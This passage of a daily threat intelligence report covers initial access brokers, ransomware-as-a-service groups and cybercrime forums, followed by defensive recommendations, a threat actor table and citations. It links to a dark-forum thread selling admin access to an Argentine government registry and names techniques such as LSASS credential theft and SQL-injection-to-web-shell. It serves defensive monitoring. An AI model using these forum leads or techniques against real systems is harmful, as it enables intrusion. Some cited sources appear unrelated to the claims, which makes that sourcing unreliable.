  • Relevance to Incident: This activity is entirely consistent with ‘PaniTo’s’ actions observed in Incident 11, reinforcing their focus on selling high-privilege access to Latin American government digital assets via the same cybercrime forum.
  • Incident Details & Potential Impact: Obtaining administrator access to a government registry responsible for legal entities and commerce presents extremely critical risks. A malicious actor could potentially manipulate official business records, leading to legal chaos and fraud. They could steal sensitive corporate data and personal information submitted during registration processes, disrupt essential registry services relied upon by businesses and legal professionals, potentially issue fraudulent business certificates or approvals, engage in corporate espionage, or cause significant economic and political disruption within the province. The potential for abuse is vast and could severely damage trust in the provincial government’s administrative functions.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-I-sell-Admin-Access-of-personasjuridicas-chaco-gov-ar
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/3ac2d632-a7ef-422a-88a2-3746cb3c2b99.png

Analysis of the incidents reported over the past 24 hours reveals several persistent and evolving trends in the cyber threat landscape:

  • Dominance of Ransomware-as-a-Service (RaaS): The continued prominence of the RaaS model is evident, with MEDUSA, NightSpire, and RALord all operating under this structure. This model significantly lowers the barrier to entry for less technically skilled affiliates, enabling widespread attack campaigns, while allowing core developers to focus on refining malware payloads and extortion strategies.1 The ecosystem shows increasing signs of professionalization, including active recruitment for specialized roles (e.g., negotiators 3, technical experts 5) and defined profit-sharing arrangements.1 The persistence and evolution of RaaS, incorporating advanced payloads (e.g., Rust-based options 5) and sophisticated multi-layered extortion 5, suggest it remains a highly effective and profitable criminal business model that will likely continue to pose a primary threat. Effective defense requires understanding both the TTPs of the core RaaS groups and the common tactics employed by their affiliates and the IABs supplying them access.
  • Critical Role of Initial Access Brokers (IABs): Multiple incidents directly involve the sale of network access by IABs (‘Incognito’, ‘Zimmer’, ‘PaniTo’). Furthermore, established RaaS groups like MEDUSA actively recruit IABs to source victims.1 IABs function as crucial specialists within the cybercrime supply chain, identifying vulnerabilities, gaining unauthorized access, and then commoditizing that access for sale.7 They provide the essential foothold required for many devastating attacks, particularly ransomware, enabling attackers to bypass the initial, often time-consuming, intrusion phase.8 Disrupting the IAB market – through enhanced vulnerability management, robust credential security, and proactive monitoring of illicit forums – is therefore a critical component in hindering the broader cybercrime ecosystem. The public (within criminal circles) nature of their advertisements offers a potential, albeit challenging, source of early warning intelligence for vigilant organizations.22
  • Cybercrime Forum Resilience and Specialization: Despite periodic law enforcement takedowns and seizures affecting major platforms like RaidForums and various iterations of BreachForums 10, the ecosystem demonstrates remarkable resilience. New forums emerge, existing ones rebrand (e.g., Cracked.io’s reported reemergence 17), and threat actors quickly migrate. Platforms mentioned in this report’s incidents (DarkForums.st, XSS.is, Exploit.in, Leakbase.io) serve as vital hubs for advertising data leaks, selling initial access, sharing tools and techniques, and facilitating communication and recruitment among threat actors.10 This resilience underscores the difficulty in permanently dismantling these underground marketplaces and necessitates continuous monitoring of active forums as a core component of threat intelligence gathering.
  • Prevalence of Multi-Extortion Tactics: Ransomware groups observed in this period (MEDUSA, RALord, NightSpire) consistently utilize double extortion tactics, combining data encryption with the threat of public data leakage.2 Some groups, like RALord, are incorporating additional layers, such as detailed public shaming reports that name failed security controls.5 These multi-faceted extortion approaches significantly increase pressure on victims, moving beyond the simple need for data recovery to encompass concerns about reputational damage, regulatory penalties, and public embarrassment. Consequently, organizational defense strategies must prioritize preventing data exfiltration alongside preventing encryption. Incident response planning must also explicitly account for the public relations, legal, and notification requirements associated with potential data exposure.
  • Diverse and Opportunistic Targeting: The victims identified in this reporting period span a wide range of industry sectors (Government Administration, Consumer Services, Information Services, Automotive, Banking, Non-profit, Manufacturing, E-commerce, Electrical Manufacturing) and geographical locations (USA, UAE, Vietnam, Egypt, France, Germany, Brazil, Argentina). While some actors demonstrate a degree of specialization (e.g., ‘PaniTo’ focusing on Latin American government targets), many RaaS operations, driven by affiliate or IAB activity, appear highly opportunistic, targeting organizations based on perceived vulnerability rather than solely on sector or size.1 This broad targeting reinforces the notion that no sector or region is immune, and organizations of all types must maintain a robust security posture, as opportunistic attacks often exploit basic security hygiene failures.

4. Mitigation & Recommendations

Based on the observed incidents and trends, the following mitigation strategies and recommendations are advised:

  • Strengthen Credential Security: Implement multi-factor authentication (MFA) across all critical access points, including VPNs, RDP, administrative accounts, email systems, and cloud services.2 Enforce policies for strong, unique passwords and actively monitor for compromised credentials appearing in data breaches or infostealer logs.9 Conduct regular audits of user privileges, adhering to the principle of least privilege.
  • Vulnerability and Patch Management: Maintain a rigorous patch management program, prioritizing vulnerabilities in internet-facing systems and software frequently exploited by threat actors. This includes VPN appliances, RDP services, Microsoft Exchange Servers, web servers, and common web applications/CMS platforms.2 Implement regular vulnerability scanning and penetration testing to identify weaknesses proactively.
  • Secure Remote Access: Harden configurations for RDP, VPNs, and other remote access solutions.8 Disable unnecessary ports and services.2 Implement strict network traffic filtering rules to limit inbound and outbound connections to only what is essential.2 Monitor remote access logs closely for unusual login patterns, locations, or timings.
  • Network Segmentation: Design and implement network segmentation to isolate critical systems and data from general user networks and other less sensitive segments.2 This strategy can significantly limit an attacker’s ability to move laterally across the network after an initial compromise, thereby containing the impact of incidents like ransomware.
  • Defense Against Ransomware TTPs: Deploy and properly configure advanced Endpoint Detection and Response (EDR) solutions capable of identifying and blocking common ransomware TTPs, such as the abuse of legitimate tools (LOTL techniques like PowerShell 1), process injection, credential theft attempts (e.g., targeting LSASS), and attempts to disable security software.3 Maintain updated threat intelligence feeds to block known malicious IP addresses, domains, and file hashes associated with active ransomware campaigns.1 Implement application control or allow-listing to restrict the execution of unauthorized software, including tools commonly used for lateral movement (e.g., PsExec 35). Ensure robust data backup strategies are in place, including regular, tested, offline, and potentially immutable backups to facilitate recovery without paying a ransom.13
  • Web Application Security: Protect web applications against common vulnerabilities like SQL injection (as seen in Incident 9) and cross-site scripting (XSS). Utilize Web Application Firewalls (WAFs), conduct regular security code reviews, and perform security testing specific to web applications. Keep all web server software and CMS platforms updated.
  • Threat Intelligence Monitoring: Consider leveraging threat intelligence services or internal capabilities to monitor dark web forums, IAB marketplaces, and data leak sites for mentions of organizational assets, domains, IP addresses, or employee credentials being sold or leaked.22 Stay informed about the evolving TTPs of prominent ransomware groups and IABs.21
  • Incident Response Preparedness: Develop, maintain, and regularly exercise a comprehensive incident response plan. This plan should specifically address ransomware and data breach scenarios, incorporating steps for containment, eradication, recovery, post-incident analysis, and crucially, communication strategies (internal, external, legal, regulatory) that anticipate double extortion tactics and potential data exposure.2 Ensure legal counsel experienced in cyber incidents is readily available.

5. Appendix

Threat Actor Summary Table

The following table provides a consolidated overview of the threat actors identified in the incidents covered within this report, summarizing their type, key characteristics, motivations, and associated platforms. This facilitates a quick comparison and understanding of the diverse roles and methods observed during this reporting period.

Threat ActorTypeKey TTPs/CharacteristicsPrimary MotivationAssociated Forums/PlatformsAssociated Incidents (JSON Title)
MEDUSARaaSDouble Extortion (Blog+Telegram), IAB Recruitment, LOTL/PowerShell, Targets Critical Infrastructure & US OrgsFinancials7lmmhlt…onion, Telegram (information support)Appalachian Regional Commission, Conditioned Air Company
krektiData LeakerLeaks forum data (credentials, PII, IPs)Reputation/Disruption/Financial?darkforums.stAlleged data breach of Breached.fi
IncognitoIABSells RDWeb/VPN accessFinancialxss.isAlleged sale of unauthorized access to multiple companies
goldshark11Data LeakerLeaks sensitive PII & Financial data (Bank Balances, IDs)Financialdarkforums.stAlleged Data Leak of Vietnam Bank
listen0022Data LeakerLeaks PII (Contact Info) from Non-profitsFinancial/Reputation?leakbase.ioAlleged Leak of USA Human Rights Database
KAL EGY 319DefacementWebsite defacement, Telegram announcementNotoriety/Hacktivism?Telegram (KALE3G1Y9)KAL EGY 319 targets the website of Aqua General
NightSpireRaaS (Emerging)Tor Leak Site, Exploits Perimeter Vulns (e.g., FortiOS), Uses Legitimate Tools for Exfil/EvasionFinancialnspireyz…onion, BreachForums2 (recruitment attempt)MFR CULTIVONS LES REUSSITES
ZimmerIABSells E-commerce Admin Access (via SQLi), Offers Web ShellFinancialexploit.inAlleged sale of access to an unidentified US OpenCart platform
RALordRaaS (Emerging)RaaS (NOVA infra), Standalone Encryptor, Rust Payload Option, Tor DLS with Detailed Shaming Reports, qTox CommsFinancialralord3h…onion, Cybercrime Forums (‘ForLord’ user)HELUKABEL GmbH
PaniToIABSells Admin Access to LATAM Government WebsitesFinancialdarkforums.stAlleged sale of admin access to SECEC-RJ (Brazil), Alleged sale of admin access to Chaco Gov (Argentina)

Works cited

  1. #StopRansomware: Medusa Ransomware | CISA, accessed April 24, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
  2. How to guard against a vicious Medusa ransomware attack – before it’s too late | ZDNET, accessed April 24, 2025, https://www.zdnet.com/article/how-to-guard-against-a-vicious-medusa-ransomware-attack-before-its-too-late/
  3. Ransomware in focus: Meet NightSpire – S-RM, accessed April 24, 2025, https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-nightspire
  4. NightSpire Ransomware | WatchGuard Technologies, accessed April 24, 2025, https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/nightspire
  5. RALord Ransomware Group: Threat Profile & Attack Tactics – Cyble, accessed April 24, 2025, https://cyble.com/threat-actor-profiles/ralord-ransomware-group/
  6. ARaaStocracy – RALord ransomware emerges with new DLS – CYJAX, accessed April 24, 2025, https://www.cyjax.com/resources/blog/araastocracy-ralord-ransomware-emerges-with-new-dls/
  7. en.wikipedia.org, accessed April 24, 2025, https://en.wikipedia.org/wiki/Initial_access_broker#:~:text=Initial%20access%20brokers%20(or%20IABs,cybercrime%20as%20a%20service%20economy%22.
  8. Initial access broker – Wikipedia, accessed April 24, 2025, https://en.wikipedia.org/wiki/Initial_access_broker
  9. No, OpenAI Wasn’t Breached—The Real Threat Comes from Infostealers | KELA Cyber, accessed April 24, 2025, https://www.kelacyber.com/blog/openai-breach/
  10. BreachForums – Wikipedia, accessed April 24, 2025, https://en.wikipedia.org/wiki/BreachForums
  11. Medusa Ransomware Turning Your Files into Stone, accessed April 24, 2025, https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
  12. Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion – The Hacker News, accessed April 24, 2025, https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html
  13. Medusa ransomware: What organizations need to know – ThreatDown by Malwarebytes, accessed April 24, 2025, https://www.threatdown.com/blog/medusa-ransomware-what-organizations-need-to-know/
  14. Feds: Widespread US critical infrastructure targeting conducted by Medusa ransomware, accessed April 24, 2025, https://www.scworld.com/brief/feds-widespread-us-critical-infrastructure-targeting-conducted-by-medusa-ransomware
  15. Breach Forums | Flashpoint, accessed April 24, 2025, https://flashpoint.io/intelligence-101/breach-forums/
  16. BreachForums Seized by FBI: Inside the Notorious Cybercrime Marketplace, accessed April 24, 2025, https://www.kelacyber.com/blog/breachforums-seized-by-fbi-inside-the-notorious-cybercrime-marketplace/
  17. Cracked cybercrime forum reemerges – SC Media, accessed April 24, 2025, https://www.scworld.com/brief/cracked-cybercrime-forum-reemerges
  18. Threat actor is selling data on 5.4 million Twitter users for $30K on hacking forum, accessed April 24, 2025, https://www.bitdefender.com/en-us/blog/hotforsecurity/threat-actor-is-selling-data-on-5-4-million-twitter-users-for-30k-on-hacking-forum
  19. CTA “mud” Actively Leaking K-12 Directories on Breach Forums, accessed April 24, 2025, https://www.cisecurity.org/insights/blog/cta-mud-actively-leaking-k12-directories-on-breach-forums
  20. Initial Access Brokers – Arctic Wolf, accessed April 24, 2025, https://arcticwolf.com/resources/glossary/what-are-initial-access-brokers/
  21. Initial Access Brokers How They’re Changing Cybercrime – CIS Center for Internet Security, accessed April 24, 2025, https://www.cisecurity.org/insights/blog/initial-access-brokers-how-theyre-changing-cybercrime
  22. A Deep-Dive Into Initial Access Brokers: Trends, Statistics, Tactics and more – Cyberint, accessed April 24, 2025, https://cyberint.com/blog/research/a-deep-dive-into-initial-access-brokers-trends-statistics-tactics-and-more/
  23. What are Initial Access Brokers? – Searchlight Cyber, accessed April 24, 2025, https://slcyber.io/blog/what-are-initial-access-brokers/
  24. Initial Access Brokers (IAB) – Flare | Cyber Threat Intel | Digital Risk Protection, accessed April 24, 2025, https://flare.io/glossary/initial-access-brokers/
  25. Initial Access Brokers Are Key to Rise in Ransomware Attacks | Recorded Future, accessed April 24, 2025, https://www.recordedfuture.com/research/initial-access-brokers-key-to-rise-in-ransomware-attacks
  26. Mitigating the Risk of Initial Access Brokers – Searchlight Cyber, accessed April 24, 2025, https://slcyber.io/blog/mitigating-the-risk-of-initial-access-brokers/
  27. How Threat Actors Are Selling Access to Corporate Networks – Constella Intelligence, accessed April 24, 2025, https://constella.ai/selling-access-to-corporate-networks/
  28. special topics in irregular warfare: understanding resistance – usasoc, accessed April 24, 2025, https://www.soc.mil/ARIS/books/pdf/SpecialTopics.pdf
  29. CITY COUNCIL AGENDA – IIS Windows Server, accessed April 24, 2025, https://cms5.revize.com/revize/cityofsedrowoolley/Governing%20Bodies/Council/Packets/2016/20160525_council_packet.pdf
  30. Revealing Emperor Dragonfly: Night Sky and Cheerscrypt – A Single Ransomware Group, accessed April 24, 2025, https://www.sygnia.co/threat-reports-and-advisories/revealing-emperor-dragonfly-a-chinese-ransomware-group/
  31. 2025 Ransomware: Business as Usual, Business is Booming | Rapid7 Blog, accessed April 24, 2025, https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/
  32. From RA Group to RA World: Evolution of a Ransomware Group – Palo Alto Networks Unit 42, accessed April 24, 2025, https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/
  33. Massive Phishing Campaign Strikes Latin America: Venom RAT Targeting Multiple Sectors, accessed April 24, 2025, https://thehackernews.com/2024/04/massive-phishing-campaign-strikes-latin.html
  34. Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan, accessed April 24, 2025, https://thehackernews.com/2024/06/grandoreiro-banking-trojan-hits-brazil.html
  35. What Is Royal Ransomware? – Akamai, accessed April 24, 2025, https://www.akamai.com/glossary/what-is-royal-ransomware
  36. #StopRansomware: Blacksuit (Royal) Ransomware | CISA, accessed April 24, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
  37. Ransomware hits hundreds of dentist offices in the US – ZDNET, accessed April 24, 2025, https://www.zdnet.com/article/ransomware-hits-hundreds-of-dentist-offices-in-the-us/

Related Posts